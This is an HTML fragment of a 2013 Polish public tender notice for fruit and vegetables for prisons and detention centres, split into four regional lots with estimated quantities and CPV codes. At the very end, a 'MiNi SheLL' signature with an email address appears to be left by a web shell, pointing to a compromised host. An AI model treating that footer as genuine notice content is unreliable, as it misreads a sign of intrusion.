2. Jeżeli zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia, wyjaśnienia oraz informację za pomocą faksu, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
3. Każdy wykonawca ma prawo zwrócić się do zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Pytania wykonawców muszą być skierowane na adres zamawiającego. Zamawiający udzieli niezwłocznie odpowiedzi wszystkim wykonawcom, którzy pobrali specyfikację istotnych warunków zamówienia, zgodnie z dyspozycją art. 38 ustawy Pzp.
4. Jeżeli siwz jest udostępniona na stronie internetowej, to treść zapytania wraz z wyjaśnieniami zamawiającego również zostaną tam zamieszczone.
5. Zamawiający nie przewiduje zorganizowania zebrania z wykonawcami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bigb-baltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BIGB BALTICA o/Potulice ul.ALEJA PARKOWA 1 89-120 POTULICE.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2013 godzina 12:00, miejsce: BIGB BALTICA o/Potulice ul.ALEJA PARKOWA 1 89-120 POTULICE ,SEKRETARIAT ZK POTULICE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1

ZK Potulice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne - o średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jednostka miary kilogram.
CPV: 03212100-6.
ilość szacunkowa: 1500 kg
Marchew - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram.
CPV: 03221112-4
ilość szacunkowa: 400 kg
Kapusta czerwona - w główkach, o minimalnej wadze główki 2,5 kg, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 300 kg
Groch łuskany, połówki, jednostka miary kilogram.
CPV: 03221220-4. 
ilość szacunkowa: 200 kg
Fasola typu Jaś, duża, jednostka miary kilogram.
CPV: 03221210-1. 
ilość szacunkowa: 200 kg
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
ilość szacunkowa: 2000 kg
Burak ćwikłowy - średniej wielkości, jednostka miary kilogram.
CPV: 03221111-7. 
ilość szacunkowa: 600 kg
Pietruszka korzeń - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram.
CPV: 03221100-7. 
ilość szacunkowa: 
100 kg
Nać pietruszki - o przeciętnej wadze pęczka ok. 100 g i maksymalnej długości 15 cm jednostka miary kilogram.
CPV: 03221300-9.
ilość szacunkowa: 
50 kg
Koper - o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 15 cm, jednostka miary kilogram.
CPV: 03221300-9.
ilość szacunkowa: 
50 kg
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram.
CPV: 03221270-9. 
ilość szacunkowa: 700 kg
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
ilość szacunkowa: 300 kg
Pieczarka - o średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3cm do 5cm, jednostka miary kilogram.
CPV: 03221260-6. 
ilość szacunkowa: 500 kg
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram.
CPV: 03221240-0. 
ilość szacunkowa: 500 kg
Por - oczyszczony, gruby, w całości, jednostka miary kilogram.
CPV: 03222230-4. 
ilość szacunkowa: 
100 kg
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 
ilość szacunkowa:
20 kg
Kapusta włoska - w główkach, o wadze główki od 1,8 kg do 4,0 kg, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 100 kg
Kapusta biała - w główkach, o wadze główki od 2 kg do 4 kg, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 500 kg
Kapusta pekińska - w główkach, o minimalnej średnicy 10 cm i minimalnej długości 20 cm, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 400 kg
Cukinia - jednostka miary kg.
CPV: 03221310-2.
ilość szacunkowa:  200  kg
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
ilość szacunkowa: 200 szt.
Sałata lodowa główka  -  jednostka miary szt.
CPV: 03221310-2. 
ilość szacunkowa: 300 szt.
Sałata karbowana czerwona główka,  jednostka miary szt.
CPV: 03221310-2. 
ilość szacunkowa: 150 szt.
Kalafior, jednostka miary szt.
CPV: 03221420-6.
ilość szacunkowa: 500 szt.
Brokuły, jednostka miary szt.
CPV: 03221430-9. 
ilość szacunkowa: 500 szt.
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
ilość szacunkowa: 150 szt.
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
ilość szacunkowa: 500 szt.
Mięta świeża doniczka, jednostka miary szt.
CPV: 03121100-6. 
ilość szacunkowa: 
50 szt.
Bazylia świeża doniczka,  jednostka miary szt.
CPV: 03121100-6.
ilość szacunkowa: 
50 szt.
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram.
CPV: 03221100-7.
ilość szacunkowa: 
50 kg
Kapusta kwaszona z marchewką - bez konserwantów, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 300 kg
Banan - jednostka miary kg.
CPV: 03222111-4. 
ilość szacunkowa: 800 kg
Grejpfrut - jednostka miary kg.
CPV: 03222230-4. 
ilość szacunkowa: 400 kg
Winogrono zielone - jednostka miary kg.
CPV: 032222340-8. 
ilość szacunkowa: 400 kg
Winogrono fioletowe - jednostka miary kg.
CPV: 032222340-8. 
ilość szacunkowa: 400 kg
Gruszki - jednostka miary kg.
CPV: 03222322-6. 
ilość szacunkowa: 400 kg
Kiwi - jednostka miary kg.
CPV: 03222118-3. 
ilość szacunkowa: 
150 kg
Pomarańcze - jednostka miary kg.
CPV: 03222200-1.
ilość szacunkowa: 2000 kg
Mandarynki - jednostka miary kg. 
CPV: 03222240-7. 
ilość szacunkowa: 3000 kg
Cytryny, jednostka miary kilogram.
CPV: 03222210-8. 
ilość szacunkowa: 500 kg
Jabłka - całe, średniej wielkości, jednostka miary kilogram.
CPV: 03222321-9. 
ilość szacunkowa: 2000 kg
Fasolka szparagowa (sezonowo),  jednostka miary kg.
CPV: 03221212-0. 
ilość szacunkowa: 200 kg
Wiśnie (sezonowo),  jednostka miary kg.
CPV: 03222333-6. 
ilość szacunkowa: 200 kg
Śliwki (sezonowo),    jednostka miary kg.
CPV: 03222334-3. 
ilość szacunkowa: 300 kg
Brzoskwinia (sezonowo),  jednostka miary kg.
CPV: 03222332-9. 
ilość szacunkowa: 300 kg
Truskawki (sezonowo) , pakowane w łubianki do 3 kg , jednostka miary kg.
CPV: 03222313-0.
ilość szacunkowa: 500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-6, 03.22.11.12-4, 03.22.14.10-3, 03.22.12.10-1, 03.22.11.12-1, 03.22.11.11-7, 03.22.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2

AŚ Bydgoszcz, ZK Koronowo,
ZK Bydgoszcz-Fordon,
AŚ Chojnice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Przedmiot zamówienia
j.m
Ilość szacunkowa
47. 
Ziemniaki jadalne - o średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jednostka miary kilogram.
CPV: 03212100-6.
kg
1200
48. 
Marchew - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram.
CPV: 03221112-4
kg
400
49. 
Kapusta czerwona - w główkach, o minimalnej wadze główki 2,5 kg, jednostka miary kilogram.
CPV: 03221410-3. 
kg
200
50. 
Groch łuskany, połówki, jednostka miary kilogram.
CPV: 03221220-4. 
kg
200
51. 
Fasola typu Jaś, duża, jednostka miary kilogram.
CPV: 03221210-1. 
kg
200
52. 
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
kg
1500 
53. 
Burak ćwikłowy - średniej wielkości, jednostka miary kilogram.
CPV: 03221111-7. 
kg
400 
54. 
Pietruszka korzeń - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram.
CPV: 03221100-7. 
kg

60 
55. 
Nać pietruszki - o przeciętnej wadze pęczka ok. 100 g i maksymalnej długości 15 cm 
CPV: 03221300-9.
kg

50
56. 
Koper - o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 15 cm, jednostka miary kilogram.
CPV: 03221300-9.
kg

50 
57. 
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram.
CPV: 03221270-9. 
kg
500 
58. 
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
kg
200
59. 
Pieczarka - o średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3cm do 5cm, jednostka miary kilogram.
CPV: 03221260-6. 
kg
300 
60. 
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram.
CPV: 03221240-0. 
kg
600
61. 
Por - oczyszczony, gruby, w całości, jednostka miary kilogram.
CPV: 03222230-4. 
kg
 
50 
62. 
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 
kg
 
20 
63. 
Kapusta włoska - w główkach, o wadze główki od 1,8 kg do 4,0 kg, jednostka miary kilogram.
CPV: 03221410-3. 
kg
100
64. 
Kapusta biała - w główkach, o wadze główki od 2 kg do 4 kg, jednostka miary kilogram.
CPV: 03221410-3. 
kg
200
65. 
Kapusta pekińska - w główkach, o minimalnej średnicy 10 cm i minimalnej długości 20 cm, jednostka miary kilogram.
CPV: 03221410-3. 
kg
 300 
66. 
Cukinia - jednostka miary kg.
CPV: 03221310-2.
kg
200
67. 
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
szt
200 .
68. 
Sałata lodowa główka  -  jednostka miary szt.
CPV: 03221310-2. 
szt
300
69. 
Sałata karbowana czerwona główka,  jednostka miary szt.
CPV: 03221310-2. 
szt
150
70. 
Kalafior, jednostka miary szt.
CPV: 03221420-6.
szt
500
71. 
Brokuły, jednostka miary szt.
CPV: 03221430-9. 
szt
500
72. 
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
szt
150
73. 
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
szt
500
74. 
Mięta świeża doniczka, jednostka miary szt.
CPV: 03121100-6. 
szt
 
30 
75. 
Bazylia świeża doniczka,  jednostka miary szt.
CPV: 03121100-6.
szt
 
30 
76. 
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram.
CPV: 03221100-7.
kg

50 
77. 
Kapusta kwaszona z marchewką - bez konserwantów, jednostka miary kilogram.
CPV: 03221410-3. 
kg
300 
78. 
Banan - jednostka miary kg.
CPV: 03222111-4. 
kg
 800 
79. 
Grejpfrut - jednostka miary kg.
CPV: 03222230-4. 
kg
 500 
80. 
Winogrono zielone - jednostka miary kg.
CPV: 032222340-8. 
kg
 400 
81. 
Winogrono fioletowe - jednostka miary kg.
CPV: 032222340-8. 
kg
 400 
82. 
Gruszki - jednostka miary kg.
CPV: 03222322-6. 
kg
400
83. 
Kiwi - jednostka miary kg.
CPV: 03222118-3. 
kg

250 
84. 
Pomarańcze - jednostka miary kg.
CPV: 03222200-1.
kg
2000
85. 
Mandarynki - jednostka miary kg. 
CPV: 03222240-7. 
kg
3000
86. 
Cytryny, jednostka miary kilogram.
CPV: 03222210-8. 
kg
500
87. 
Jabłka - całe, średniej wielkości, jednostka miary kilogram.
CPV: 03222321-9. 
kg
 2000 
88. 
Fasolka szparagowa (sezonowo),  jednostka miary kg.
CPV: 03221212-0. 
kg
200
89. 
Wiśnie (sezonowo),  jednostka miary kg.
CPV: 03222333-6. 
kg
200
90. 
Śliwki (sezonowo),    jednostka miary kg.
CPV: 03222334-3. 
kg
300
91. 
Brzoskwinia (sezonowo),  jednostka miary kg.
CPV: 03222332-9. 
kg
300
92. 
Truskawki (sezonowo) , pakowane w łubianki do 3 kg , jednostka miary kg.
CPV: 03222313-0.
kg
500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-6, 03.22.11.12-4, 03.22.14.10-3, 03.22.12.20-4, 03.22.12.10-1, 03.22.11.12-1, 03.22.11.11-7, 03.22.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3

ZK Nr 1 Grudziądz, 
ZK Nr 2 Grudziądz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia i jego opiS
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
kg
500 
2
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram. CPV: 03221270-9. 
kg
500 
3
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
kg
200 
4
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram. CPV: 03221240-0. 
kg
600
5
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 
kg
20 
6
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
szt.
50
7
Kalafior, jednostka miary szt.
CPV: 03221420-6.
szt.
50 
8
Brokuły, jednostka miary szt.
CPV: 03221430-9. 
szt.
50 
9
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
szt.
150
10
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
szt.
500 
11
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram.
CPV: 03221100-7.
kg
50
12
Banan - jednostka miary kg.
CPV: 03222111-4. 
kg
800
13
Grejpfrut - jednostka miary kg.
CPV: 03222230-4. 
kg
500
14
Winogrono zielone - jednostka miary kg.
CPV: 032222340-8. 
kg
400
15
Winogrono fioletowe - jednostka miary kg.
CPV: 032222340-8. 
kg
400
16
Gruszki - jednostka miary kg.
CPV: 03222322-6. 
kg
400
17
Kiwi - jednostka miary kg.
CPV: 03222118-3. 
kg
250
18
Pomarańcze - jednostka miary kg.
CPV: 03222200-1.
kg
1000
19
Mandarynki - jednostka miary kg. 
CPV: 03222240-7. 
kg
3000
20
Cytryny, jednostka miary kilogram.
CPV: 03222210-8. 
kg
500
21
Jabłka - całe, średniej wielkości, jednostka miary kilogram.
CPV: 03222321-9. 
kg
2000
22
Wiśnie (sezonowo), jednostka miary kg.
CPV: 03222333-6. 
kg
200
23
Śliwki (sezonowo), jednostka miary kg.
CPV: 03222334-3. 
kg
300
24
Brzoskwinia (sezonowo),  jednostka miary kg.
CPV: 03222332-9. 
kg
300
25
Truskawki (sezonowo), pakowane w łubianki do 3 kg, jednostka miary kg. CPV: 03222313-0.
kg
500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.12-1, 03.22.12.70-9, 03.22.12.30-7, 03.22.12.40-0, 03.22.11.00-7, 03.22.13.10-2, 03.22.14.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa 4

AŚ Inowrocław,
AŚ Toruń, 
ZK Włocławek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.
Przedmiot zamówienia i jego opis
j.m.
Ilość szacunkowa
1
2
3
4
1
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
kg
300 
2
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram. CPV: 03221270-9. 
kg
500 
3
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
kg
200 
4
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram. CPV: 03221240-0. 
kg
600
5
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 
kg
20 
6
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
szt.
50
7
Kalafior, jednostka miary szt.
CPV: 03221420-6.
szt.
50 
8
Brokuły, jednostka miary szt.
CPV: 03221430-9. 
szt.
50 
9
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
szt.
150
10
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
szt.
500 
11
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram.
CPV: 03221100-7.
kg
50
12
Banan - jednostka miary kg.
CPV: 03222111-4. 
kg
800
13
Grejpfrut - jednostka miary kg.
CPV: 03222230-4. 
kg
500
14
Winogrono zielone - jednostka miary kg.
CPV: 032222340-8. 
kg
400
15
Winogrono fioletowe - jednostka miary kg.
CPV: 032222340-8. 
kg
400
16
Gruszki - jednostka miary kg.
CPV: 03222322-6. 
kg
400
17
Kiwi - jednostka miary kg.
CPV: 03222118-3. 
kg
150
18
Pomarańcze - jednostka miary kg.
CPV: 03222200-1.
kg
1000
19
Mandarynki - jednostka miary kg. 
CPV: 03222240-7. 
kg
3000
20
Cytryny, jednostka miary kilogram.
CPV: 03222210-8. 
kg
500
21
Jabłka - całe, średniej wielkości, jednostka miary kilogram.
CPV: 03222321-9. 
kg
2000
22
Wiśnie (sezonowo), jednostka miary kg.
CPV: 03222333-6. 
kg
200
23
Śliwki (sezonowo), jednostka miary kg.
CPV: 03222334-3. 
kg
300
24
Brzoskwinia (sezonowo),  jednostka miary kg.
CPV: 03222332-9. 
kg
300
25
Truskawki (sezonowo), pakowane w łubianki do 3 kg, jednostka miary kg. CPV: 03222313-0.
kg
500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.12-1, 03.22.12.70-9, 03.22.12.30-7, 03.22.12.40-0, 03.22.11.00-7, 03.22.13.10-2, 03.22.14.20-6, 03.22.14.30-9, 03.22.12.40-0, 03.22.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com